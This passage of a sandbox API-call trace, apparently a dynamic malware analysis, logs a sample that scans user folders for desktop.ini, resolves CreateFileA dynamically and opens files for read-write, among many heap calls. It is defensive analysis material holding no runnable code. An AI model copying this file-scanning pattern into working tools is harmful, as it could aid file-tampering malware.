ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.121] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.122] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.122] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0037.123] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.125] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8898c8 [0037.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8898c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.126] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0037.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8898c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.126] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0037.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x34) returned 0x7c2080 [0037.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", cchWideChar=52, lpMultiByteStr=0x7c2080, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpUsedDefaultChar=0x0) returned 52 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.127] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=52, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x68) returned 0x7c10a8 [0037.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=52, lpWideCharStr=0x7c10a8, cchWideChar=52 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 52 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.128] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.129] HeapFree (in: hHeap=0x770000, 